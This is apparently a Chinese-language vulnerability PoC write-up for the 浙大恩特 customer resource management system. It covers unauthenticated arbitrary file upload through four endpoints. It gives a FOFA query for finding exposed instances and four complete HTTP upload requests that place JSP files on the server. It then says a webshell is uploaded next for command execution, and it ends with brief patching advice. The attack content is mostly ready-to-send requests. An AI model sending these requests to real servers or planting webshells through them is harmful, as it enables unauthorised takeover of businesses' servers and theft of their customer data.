浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
浙大恩特客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
FOFA:app="浙大恩特客户资源管理系统"

PoC-1
- POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=1.jsp HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
- Content-Type: application/x-www-form-urlencoded
- Connection: close
- Accept-Encoding: gzip, deflate
-
- 123

回显了上传路径
验证

PoC-2
- POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A
-
-
- ------WebKitFormBoundarye8FPHsIAq9JN8j2A
- Content-Disposition: form-data; name="file";filename="2.jsp"
- Content-Type: image/jpeg
-
- <%out.print("test");%>
- ------WebKitFormBoundarye8FPHsIAq9JN8j2A--

回显了上传路径
验证

PoC-3
- POST /entsoft/MailAction.entphone;.js?act=saveAttaFile HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed exchange;v=b3;q=0.9
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A
-
- ------WebKitFormBoundarye8FPHsIAq9JN8j2A
- Content-Disposition: form-data; name="file";filename="3.jsp"
- Content-Type: image/jpeg
-
- <%out.print("test");%>
- ------WebKitFormBoundarye8FPHsIAq9JN8j2A--

回显了上传路径
验证

PoC-4
- POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum=&fileName=4.jsp&strAffixStr=&oprfilenam=null&gesnum= HTTP/1.1
- Host: your-ip
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQzxXQpKIb1f32N11
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Connection: close
-
- ------WebKitFormBoundaryQzxXQpKIb1f32N11
- Content-Disposition: form-data; name="oprfilenam"
-
- null
- ------WebKitFormBoundaryQzxXQpKIb1f32N11
- Content-Disposition: form-data; name="uploadflg"
-
- 0
- ------WebKitFormBoundaryQzxXQpKIb1f32N11
- Content-Disposition: form-data; name="strAffixStr"
-
-
- ------WebKitFormBoundaryQzxXQpKIb1f32N11
- Content-Disposition: form-data; name="selfilenam"
-
-
- ------WebKitFormBoundaryQzxXQpKIb1f32N11
- Content-Disposition: form-data; name="uploadfile"; filename="4.jsp"
- Content-Type: image/png
-
- <%out.print("test-PoC-4");%>
- ------WebKitFormBoundaryQzxXQpKIb1f32N11--
上传后响应体查找上传的的文件名,会发现上传路径
尝试验证

漏洞利用(上传马子)

命令执行
0x05 修复建议 关闭互联网暴露面或设置接口访问权限
升级至安全版本